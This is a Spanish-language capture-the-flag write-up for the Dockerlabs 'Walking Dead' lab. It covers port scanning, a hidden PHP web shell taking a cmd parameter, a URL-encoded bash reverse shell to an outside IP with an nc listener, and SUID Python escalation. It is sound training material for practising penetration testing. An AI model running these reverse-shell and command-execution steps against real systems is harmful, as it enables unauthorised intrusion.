🧟Walking Dead (Easy) - Dockerlabs

Walking Dead

Reconocimiento

❯ nmap -p 0-65535 --open -T5 -A -sT -Pn -n 172.17.0.2 -oX nmapScan.xml && xsltproc nmapScan.xml -o nmapScan.html && open nmapScan.html &>/dev/null & disown

Comienzo el reconocimiento escaneando con nmap los puertos de la máquina, hay un servidor SSH y uno HTTP, así que visito la página.

Explorando el código fuente me encuentro con un link "oculto", desde las herramientas de dev cambiamos los estilos y se puede ver claramente

El enlace lleva a la ruta /hidden/.shell.php al visitarla veo que está vacía, haciendo fuzzing encuentro también el endpoint /backup.txt pero al visitarlo me da un error 403.

Explotación

Probando con el endpoint shell.php me doy cuenta que al pasar cmd como parámetro PHP se pueden ejecutar comandos.

http://172.17.0.2/hidden/.shell.php?cmd=whoami

URLencodeo el comando bash -c 'bash -i >& /dev/tcp/192.168.1.157/443 0>&1' para darme una revshell, al poner la URL 172.17.0.2/hidden/.shell.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.1.157%2F443%200%3E%261%27 y darle a enter ya estoy dentro como www-data (habiéndome puesto antes en escucha con nc -nvlp 443).

Post explotación

En primer lugar, sanitizo la shell

Luego, viendo que binarios tienen permisos SUID veo que Python está entre ellos, con lo cual una búsqueda en GTFObins soluciona el laboratorio

Last updated